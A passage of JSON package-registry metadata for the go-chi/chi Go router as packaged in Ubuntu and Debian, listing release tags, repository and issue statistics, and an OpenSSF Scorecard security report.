Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.165Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/golang-github-go-chi-chi?arch=source\u0026distro=ubuntu-24.04","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/golang-github-go-chi-chi","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/golang-github-go-chi-chi","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/golang-github-go-chi-chi/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/golang-github-go-chi-chi/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/golang-github-go-chi-chi/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/golang-github-go-chi-chi/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/golang-github-go-chi-chi/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/golang-github-go-chi-chi/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/golang-github-go-chi-chi/codemeta","maintainers":[],"registry":{"name":"ubuntu-24.04","url":"https://launchpad.net/ubuntu/noble","ecosystem":"ubuntu","default":true,"packages_count":37306,"maintainers_count":0,"namespaces_count":4,"keywords_count":1697,"github":"ubuntu","metadata":{"codename":"noble","funded_packages_count":723},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:45.928Z","updated_at":"2026-08-10T05:07:57.238Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/namespaces"}},{"id":13684605,"name":"golang-github-go-chi-chi","ecosystem":"debian","description":null,"homepage":"https://github.com/go-chi/chi","licenses":"mit","normalized_licenses":[],"repository_url":"https://github.com/go-chi/chi","keywords_array":["golang"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-12T17:47:19.354Z","latest_release_published_at":"2026-02-12T17:47:19.354Z","latest_release_number":"5.0.7-1","last_synced_at":"2026-03-12T20:11:51.110Z","created_at":"2026-02-12T17:47:19.194Z","updated_at":"2026-08-08T10:51:35.266Z","registry_url":"https://tracker.debian.org/pkg/golang-github-go-chi-chi","install_command":"apt-get install golang-github-go-chi-chi","documentation_url":"https://packages.debian.org/bookworm/golang-github-go-chi-chi","metadata":{"component":"main","architecture":"all","priority":"extra","binary":"golang-github-go-chi-chi-dev","standards_version":"4.5.1","maintainer":"Debian Go Packaging Team \u003cteam+pkg-go@tracker.debian.org\u003e","build_depends":"debhelper-compat (= 12), dh-golang, golang-any","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-